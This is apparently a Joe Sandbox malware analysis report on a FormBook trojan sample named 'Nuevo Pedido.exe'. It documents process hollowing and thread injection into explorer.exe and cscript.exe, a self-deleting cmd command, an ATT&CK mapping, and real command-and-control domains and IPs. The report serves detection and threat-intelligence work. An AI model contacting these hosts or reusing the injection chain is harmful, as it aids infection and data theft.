            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04788794 mov eax, dword ptr fs:[00000030h]16_2_04788794
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04848F6A mov eax, dword ptr fs:[00000030h]16_2_04848F6A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04790050 mov eax, dword ptr fs:[00000030h]16_2_04790050
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04790050 mov eax, dword ptr fs:[00000030h]16_2_04790050
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h]16_2_0480B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov ecx, dword ptr fs:[00000030h]16_2_0480B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h]16_2_0480B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h]16_2_0480B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h]16_2_0480B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0480B8D0 mov eax, dword ptr fs:[00000030h]16_2_0480B8D0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h]16_2_0478B02A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h]16_2_0478B02A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h]16_2_0478B02A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0478B02A mov eax, dword ptr fs:[00000030h]16_2_0478B02A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A002D mov eax, dword ptr fs:[00000030h]16_2_047A002D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A002D mov eax, dword ptr fs:[00000030h]16_2_047A002D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A002D mov eax, dword ptr fs:[00000030h]16_2_047A002D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A002D mov eax, dword ptr fs:[00000030h]16_2_047A002D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A002D mov eax, dword ptr fs:[00000030h]16_2_047A002D
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7016 mov eax, dword ptr fs:[00000030h]16_2_047F7016
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7016 mov eax, dword ptr fs:[00000030h]16_2_047F7016
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F7016 mov eax, dword ptr fs:[00000030h]16_2_047F7016
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04844015 mov eax, dword ptr fs:[00000030h]16_2_04844015
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04844015 mov eax, dword ptr fs:[00000030h]16_2_04844015
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047758EC mov eax, dword ptr fs:[00000030h]16_2_047758EC
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AF0BF mov ecx, dword ptr fs:[00000030h]16_2_047AF0BF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AF0BF mov eax, dword ptr fs:[00000030h]16_2_047AF0BF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047AF0BF mov eax, dword ptr fs:[00000030h]16_2_047AF0BF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047B90AF mov eax, dword ptr fs:[00000030h]16_2_047B90AF
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]16_2_047A20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]16_2_047A20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]16_2_047A20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]16_2_047A20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]16_2_047A20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A20A0 mov eax, dword ptr fs:[00000030h]16_2_047A20A0
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04832073 mov eax, dword ptr fs:[00000030h]16_2_04832073
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04841074 mov eax, dword ptr fs:[00000030h]16_2_04841074
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779080 mov eax, dword ptr fs:[00000030h]16_2_04779080
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F3884 mov eax, dword ptr fs:[00000030h]16_2_047F3884
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F3884 mov eax, dword ptr fs:[00000030h]16_2_047F3884
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477B171 mov eax, dword ptr fs:[00000030h]16_2_0477B171
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477B171 mov eax, dword ptr fs:[00000030h]16_2_0477B171
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477C962 mov eax, dword ptr fs:[00000030h]16_2_0477C962
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479B944 mov eax, dword ptr fs:[00000030h]16_2_0479B944
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0479B944 mov eax, dword ptr fs:[00000030h]16_2_0479B944
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A513A mov eax, dword ptr fs:[00000030h]16_2_047A513A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A513A mov eax, dword ptr fs:[00000030h]16_2_047A513A
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04794120 mov eax, dword ptr fs:[00000030h]16_2_04794120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04794120 mov eax, dword ptr fs:[00000030h]16_2_04794120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04794120 mov eax, dword ptr fs:[00000030h]16_2_04794120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04794120 mov eax, dword ptr fs:[00000030h]16_2_04794120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04794120 mov ecx, dword ptr fs:[00000030h]16_2_04794120
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_048041E8 mov eax, dword ptr fs:[00000030h]16_2_048041E8
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779100 mov eax, dword ptr fs:[00000030h]16_2_04779100
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779100 mov eax, dword ptr fs:[00000030h]16_2_04779100
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_04779100 mov eax, dword ptr fs:[00000030h]16_2_04779100
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477B1E1 mov eax, dword ptr fs:[00000030h]16_2_0477B1E1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477B1E1 mov eax, dword ptr fs:[00000030h]16_2_0477B1E1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_0477B1E1 mov eax, dword ptr fs:[00000030h]16_2_0477B1E1
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h]16_2_047F51BE
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h]16_2_047F51BE
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h]16_2_047F51BE
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F51BE mov eax, dword ptr fs:[00000030h]16_2_047F51BE
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047F69A6 mov eax, dword ptr fs:[00000030h]16_2_047F69A6
            Source: C:\Windows\SysWOW64\cscript.exeCode function: 16_2_047A61A0 mov eax, dword ptr fs:[00000030h]16_2_047A61A0
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Process queried: DebugPort
            Source: C:\Windows\SysWOW64\cscript.exe; Process queried: DebugPort
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Code function: 3_2_00409B40 LdrLoadDll
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\explorer.exe; Domain query: www.rcepjobs.com
            Source: C:\Windows\explorer.exe; Domain query: www.sosibibyslot.website
            Source: C:\Windows\explorer.exe; Network Connect: 185.53.179.91 80
            Source: C:\Windows\explorer.exe; Domain query: www.tremblock.com
            Source: C:\Windows\explorer.exe; Domain query: www.securebankofamericalog.site
            Source: C:\Windows\explorer.exe; Domain query: www.thejohnmatt.com
            Source: C:\Windows\explorer.exe; Network Connect: 3.64.163.50 80
            Source: C:\Windows\explorer.exe; Domain query: www.blueprintroslyn.com
            Source: C:\Windows\explorer.exe; Domain query: www.onlinedatingthaiweb.com
            Source: C:\Windows\explorer.exe; Network Connect: 192.232.250.147 80
            Source: C:\Windows\explorer.exe; Network Connect: 185.53.178.53 80
            Source: C:\Windows\explorer.exe; Domain query: www.downingmunroe.online
            Source: C:\Windows\explorer.exe; Network Connect: 209.17.116.163 80

            Sample uses process hollowing technique
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Section unmapped: C:\Windows\SysWOW64\cscript.exe base address: A50000

            Maps a DLL or memory area into another process
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Section loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\cscript.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\cscript.exe; Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write

            Queues an APC in another process (thread injection)
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Thread APC queued: target process: C:\Windows\explorer.exe

            Modifies the context of a thread in another process (thread injection)
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Thread register set: target process: 3472
            Source: C:\Windows\SysWOW64\cscript.exe; Thread register set: target process: 3472

            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Process created: C:\Users\user\Desktop\Nuevo Pedido.exe C:\Users\user\Desktop\Nuevo Pedido.exe
            Source: C:\Windows\SysWOW64\cscript.exe; Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Nuevo Pedido.exe"
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Queries volume information: C:\Users\user\Desktop\Nuevo Pedido.exe VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.Linq\v4.0_4.0.0.0__b77a5c561934e089\System.Data.Linq.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Nuevo Pedido.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            Yara detected FormBook

            Remote Access Functionality:

            Yara detected FormBook

            Mitre Att&ck Matrix

            Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
            Valid Accounts | Command and Scripting Interpreter 2 | Path Interception | Process Injection 512 | Masquerading 1 | OS Credential Dumping | Security Software Discovery 221 | Remote Services | Archive Collected Data 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
            Default Accounts | Shared Modules 1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools 1 | LSASS Memory | Process Discovery 2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer 3 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
            Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 31 | Security Account Manager | Virtualization/Sandbox Evasion 31 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol 3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
            Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Process Injection 512 | NTDS | Application Window Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 13 | SIM Card Swap |  | Carrier Billing Fraud
            Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Deobfuscate/Decode Files or Information 1 | LSA Secrets | Remote System Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
            Replication Through Removable Media | Launchd | Rc.common | Rc.common | Obfuscated Files or Information 4 | Cached Domain Credentials | System Information Discovery 112 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
            External Remote Services | Scheduled Task | Startup Items | Startup Items | Software Packing 13 | DCSync | Network Sniffing | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
            Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | File Deletion 1 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue

            Behavior Graph

            [Behavior graph, ID 528617. Sample: Nuevo Pedido.exe; Startdate: 25/11/2021; Architecture: WINDOWS; Score: 100. Process chain: Nuevo Pedido.exe (started) -> Nuevo Pedido.exe (started) -> explorer.exe (injected) -> cscript.exe (started) -> cmd.exe (started) -> conhost.exe (started).]


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            Source | Detection | Scanner | Label
            Nuevo Pedido.exe | 33% | Virustotal |
            Nuevo Pedido.exe | 33% | ReversingLabs | Win32.Trojan.FormBook

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            Source | Detection | Scanner | Label
            3.0.Nuevo Pedido.exe.400000.8.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            3.2.Nuevo Pedido.exe.400000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            3.0.Nuevo Pedido.exe.400000.4.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
            3.0.Nuevo Pedido.exe.400000.6.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

            Domains

            Source | Detection | Scanner | Label
            thejohnmatt.com | 0% | Virustotal |

            URLs


            Domains and IPs

            Contacted Domains

            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            www.rcepjobs.com | 3.64.163.50 | true | true |  | unknown
            www.tremblock.com | 185.53.178.53 | true | true |  | unknown
            thejohnmatt.com | 192.232.250.147 | true | true |  | unknown
            www.downingmunroe.online | 209.17.116.163 | true | true |  | unknown
            www.onlinedatingthaiweb.com | 185.53.179.91 | true | true |  | unknown
            www.sosibibyslot.website | unknown | unknown | true |  | unknown
            www.securebankofamericalog.site | unknown | unknown | true |  | unknown
            www.thejohnmatt.com | unknown | unknown | true |  | unknown
            www.trenddoffical.com | unknown | unknown | true |  | unknown
            www.blueprintroslyn.com | unknown | unknown | true |  | unknown

                              Contacted URLs


                              URLs from Memory and Binaries

            Name | Source | Malicious | Antivirus Detection | Reputation
            http://www.rcepjobs.com | cscript.exe, 00000010.00000002.508075136.0000000004E02000.00000004.00020000.sdmp | false | Avira URL Cloud: safe | unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Nuevo Pedido.exe, 00000000.00000002.241689369.0000000002E3A000.00000004.00000001.sdmp, Nuevo Pedido.exe, 00000000.00000002.241535390.0000000002D71000.00000004.00000001.sdmp | false |  | high

                                Contacted IPs


                                Public

            IP | Domain | Country | ASN | ASN Name | Malicious
            185.53.179.91 | www.onlinedatingthaiweb.com | Germany | 61969 | TEAMINTERNET-ASDE | true
            192.232.250.147 | thejohnmatt.com | United States | 46606 | UNIFIEDLAYER-AS-1US | true
            185.53.178.53 | www.tremblock.com | Germany | 61969 | TEAMINTERNET-ASDE | true
            3.64.163.50 | www.rcepjobs.com | United States | 16509 | AMAZON-02US | true
            209.17.116.163 | www.downingmunroe.online | United States | 55002 | DEFENSE-NETUS | true

                                Private

                                IP
                                192.168.2.1

                                General Information

            Joe Sandbox Version: 34.0.0 Boulder Opal
            Analysis ID: 528617
            Start date: 25.11.2021
            Start time: 15:08:16
            Joe Sandbox Product: CloudBasic
            Overall analysis duration: 0h 10m 48s
            Hypervisor based Inspection enabled: false
            Report type: full
            Sample file name: Nuevo Pedido.exe
            Cookbook file name: default.jbs
            Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
            Number of analysed new started processes analysed: 26
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 1
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Detection: MAL
            Classification: mal100.troj.evad.winEXE@7/1@11/6
            EGA Information: Failed
            HDC Information:
            • Successful, ratio: 18.3% (good quality ratio 16.3%)
            • Quality average: 73%
            • Quality standard deviation: 32.2%
            HCA Information:
            • Successful, ratio: 99%
            • Number of executed functions: 124
            • Number of non-executed functions: 154
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .exe
            Warnings:
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
            • Excluded IPs from analysis (whitelisted): 23.211.6.115
            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, client.wns.windows.com, fs.microsoft.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
            • Not all processes where analyzed, report is missing behavior information

                                Simulations

                                Behavior and APIs

            Time | Type | Description
            15:09:08 | API Interceptor | 22x Sleep call for process: Nuevo Pedido.exe modified

                                Joe Sandbox View / Context

                                IPs


                                Domains

                                No context

                                ASN


                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Nuevo Pedido.exe.log
                                Process:C:\Users\user\Desktop\Nuevo Pedido.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):2239
                                Entropy (8bit):5.354287817410997
                                Encrypted:false
                                SSDEEP:48:MxHKXeHKlEHU0YHKhQnouHIW7HKjntHoxHhAHKzvr1qHXHK2HKgmHKovjHKs:iqXeqm00YqhQnouRqjntIxHeqzTw3q2W
                                MD5:913D1EEA179415C6D08FB255AE42B99D
                                SHA1:E994C612C0596994AAE55FBCE35B7A4FBE312FD7
                                SHA-256:473B4000084ACF4C7D701CE72EBF71BD304054231B3BDF7CAF49898A1FDA13D0
                                SHA-512:768045C288CEEE8FE1A099FC8CEA713B685F6ED3FD8BFA1C8E64CA09F7AF9FEBEA90F5277B28444AFF8F2AC7CD857DFCDF7D3A98CD86288925DB7A4A42346185
                                Malicious:true
                                Reputation:moderate, very likely benign file
                                Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.844153530186034
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                File name:Nuevo Pedido.exe
                                File size:444928
                                MD5:159c46c59cd8ecb7a2bce707de1bc370
                                SHA1:e76f6dc42b06e706b6ce49cf6c95c9eaabfc9334
                                SHA256:7f91403a34cde3f8a1d3a30a2cec9abfb30f5f7eb52f777af78fa0d34f7a27f9
                                SHA512:909c79f9172d2d525d25a02e050fd55d2043fbf257479de73a70bcb323984da620aac0abdb105194e88a5df8b135d5d27ee1e69ee56511211a89c4e911155417
                                SSDEEP:12288:ZRGvM0ReBZwHIRu6HfMTr6hNprMfGmzGixBFm:ZRIM0ReBZwHkHIrGholGi1
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....e.a..............0.................. ........@.. ....................... ............@................................

                                File Icon

                                Icon Hash:00828e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0x46ddfe
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x619F6582 [Thu Nov 25 10:29:22 2021 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:v4.0.30319
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [ebp+0800000Eh], ch

                                Data Directories

                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6ddac | 0x4f | .text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6e000 | 0x5ec | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x70000 | 0xc | .reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                Sections

                                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                .text | 0x2000 | 0x6be14 | 0x6c000 | False | 0.883305302373 | data | 7.85660170333 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rsrc | 0x6e000 | 0x5ec | 0x600 | False | 0.438802083333 | data | 4.21429058876 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc | 0x70000 | 0xc | 0x200 | False | 0.041015625 | data | 0.0815394123432 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                Name | RVA | Size | Type | Language | Country
                                RT_VERSION | 0x6e090 | 0x35c | data | |
                                RT_MANIFEST | 0x6e3fc | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                Imports

                                DLL | Import
                                mscoree.dll | _CorExeMain

                                Version Infos

                                Description | Data
                                Translation | 0x0000 0x04b0
                                LegalCopyright | Copyright Rogers Peet
                                Assembly Version | 8.0.6.0
                                InternalName | MethodImplAttribut.exe
                                FileVersion | 5.6.0.0
                                CompanyName | Rogers Peet
                                LegalTrademarks |
                                Comments |
                                ProductName | Biblan
                                ProductVersion | 5.6.0.0
                                FileDescription | Biblan
                                OriginalFilename | MethodImplAttribut.exe

                                Network Behavior

                                Snort IDS Alerts

                                Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                11/25/21-15:10:30.664595 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49784 | 185.53.178.53 | 192.168.2.5
                                11/25/21-15:11:10.632399 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49839 | 185.53.179.91 | 192.168.2.5

                                Network Port Distribution

                                TCP Packets


                                UDP Packets


                                DNS Queries

                                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                Nov 25, 2021 15:10:28.557399035 CET | 192.168.2.5 | 8.8.8.8 | 0xb6ee | Standard query (0) | www.tremblock.com | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:29.541821003 CET | 192.168.2.5 | 8.8.8.8 | 0xb6ee | Standard query (0) | www.tremblock.com | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:30.537902117 CET | 192.168.2.5 | 8.8.8.8 | 0xb6ee | Standard query (0) | www.tremblock.com | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:35.684943914 CET | 192.168.2.5 | 8.8.8.8 | 0x71a6 | Standard query (0) | www.rcepjobs.com | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:40.778733969 CET | 192.168.2.5 | 8.8.8.8 | 0x9af3 | Standard query (0) | www.sosibibyslot.website | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:46.014628887 CET | 192.168.2.5 | 8.8.8.8 | 0x9e9c | Standard query (0) | www.downingmunroe.online | A (IP address) | IN (0x0001)
                                Nov 25, 2021 15:10:54.439486027 CET | 192.168.2.5 | 8.8.8.8 | 0x579a | Standard query (0) | www.blueprintroslyn.com | A (IP address) | IN (0x0001)
